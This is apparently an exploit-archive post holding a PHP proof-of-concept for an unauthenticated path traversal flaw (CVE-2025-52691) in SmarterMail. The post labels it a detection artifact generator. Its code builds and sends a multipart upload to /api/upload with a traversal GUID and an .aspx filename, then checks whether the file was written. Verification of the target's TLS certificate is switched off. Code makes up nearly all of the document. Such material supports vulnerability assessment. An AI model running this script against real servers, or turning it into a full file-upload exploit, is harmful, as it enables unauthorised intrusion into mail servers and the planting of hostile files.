📄 SmarterMail 16.3.6989.16341 Path Traversal

=============================================================================================================================================
    | # Title     : SmarterMail 16.3.6989.16341 Detection Artifact Generator Unauthenticated Path Traversal vulnerability                       |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.smartertools.com/                                                                                               |
    =============================================================================================================================================
    
    [+] Summary: This PHP proof-of-concept is a detection-only artifact generator for CVE-2025-52691 affecting SmarterMail. 
                 It sends a crafted multipart upload request to the /api/upload endpoint, leveraging a path traversal 
    			 condition in the contextData GUID to determine whether the target is vulnerable. 
    			 The script analyzes HTTP responses and returned JSON keys to classify the target as Vulnerable, 
    			 Not Vulnerable (patched), or Unknown, without executing payloads or performing exploitation. 
                 It is intended solely for validation and security assessment purposes.
    
    [+] POC : php poc.php -H https://target.com
    
    <?php
    
    error_reporting(E_ALL);
    ini_set('display_errors', 0);
    
    $banner = <<<BANNER
    
     ██╗███╗   ██╗██████╗  ██████╗ ██╗   ██╗███████╗██╗  ██╗██╗  ██╗ █████╗ 
     ██║████╗  ██║██╔══██╗██╔═══██╗██║   ██║██╔════╝██║  ██║██║ ██╔╝██╔══██╗
     ██║██╔██╗ ██║██   █╔╝██║   ██║██║   ██║███████╗███████║█████╔╝ ███████║
     ██║██║╚██╗██║██╔══██╗██║   ██║██║   ██║╚════██║██╔══██║██╔═██╗ ██╔══██║
     ██║██║ ╚████║██████╔╝╚██████╔╝╚██████╔╝███████║██║  ██║██║  ██╗██║  ██║
     ╚═╝╚═╝  ╚═══╝╚═════╝  ╚═════╝  ╚═════╝ ╚══════╝╚═╝  ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝
            watchTowr-vs-SmarterMail-CVE-2025-52691.php
            (*) CVE-2025-52691 Detection Artifact Generator
    
    BANNER;
    
    function generateRandomName(int $length = 6): string {
        $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
        $out = '';
        for ($i = 0; $i < $length; $i++) {
            $out .= $chars[random_int(0, strlen($chars) - 1)];
        }
        return $out;
    }
    
    function dag(string $host): void {
    
        $name     = generateRandomName();
        $url      = $host . 'api/upload';
        $boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(8));
        $data  = "--{$boundary}\r\n";
        $data .= "Content-Disposition: form-data; name=\"context\"\r\n\r\nattachment\r\n";
        $data .= "--{$boundary}\r\n";
        $data .= "Content-Disposition: form-data; name=\"resumableIdentifier\"\r\n\r\nfakeID\r\n";
        $data .= "--{$boundary}\r\n";
        $data .= "Content-Disposition: form-data; name=\"resumableFilename\"\r\n\r\nfakefile.aspx\r\n";
        $data .= "--{$boundary}\r\n";
        $data .= "Content-Disposition: form-data; name=\"contextData\"\r\n\r\n";
        $data .= "{\"guid\":\"dag/../../{$name}\"}\r\n";
        $data .= "--{$boundary}\r\n";
        $data .= "Content-Disposition: form-data; name=\"whatever\"; filename=\"fake.jpg\"\r\n\r\n";
        $data .= "Detection Artifact Generator\r\n";
        $data .= "--{$boundary}--\r\n";
    
        $ch = curl_init($url);
        curl_setopt_array($ch, [
            CURLOPT_POST            => true,
            CURLOPT_POSTFIELDS      => $data,
            CURLOPT_RETURNTRANSFER  => true,
            CURLOPT_HTTPHEADER      => [
                "Content-Type: multipart/form-data; boundary={$boundary}",
                "Content-Length: " . strlen($data)
            ],
            CURLOPT_SSL_VERIFYPEER  => false,
            CURLOPT_SSL_VERIFYHOST  => false,
            CURLOPT_TIMEOUT         => 15,
        ]);
    
        $response = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
    
        if ($response === false || empty($response)) {
            echo "[!] Request failed\n";
            return;
        }
    
        $json = json_decode($response, true);
    
        if (is_string($json)) {
            $json = json_decode($json, true);
        }
    
        if (!is_array($json)) {
            echo "[+/-] UNKNOWN MESSAGE - please verify manually\n";
            return;
        }
    
        if ($httpCode === 200 && isset($json['key'])) {
            if (stripos($json['key'], $name) !== false) {
                echo "[+] VULNERABLE - file " . basename($json['key']) . " got uploaded\n";
                return;
            }
        }
    
        if ($httpCode === 400 && ($json['message'] ?? '') === 'INVALID_GUID') {
            echo "[-] NOT VULNERABLE - patch applied (INVALID_GUID)\n";
            return;
        }
    
        echo "[+/-] UNKNOWN MESSAGE - please verify manually\n";
    }
    
    echo $banner;
    
    $options = getopt("H:", ["host:"]);
    
    if (!isset($options['H']) && !isset($options['host'])) {
        echo "Usage  : php poc.php -H <host>\n";
        echo "Example: php poc.php -H https://smartermail.lab/\n";
        exit(1);
    }
    
    $host = rtrim($options['H'] ?? $options['host'], '/') . '/';
    dag($host);
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================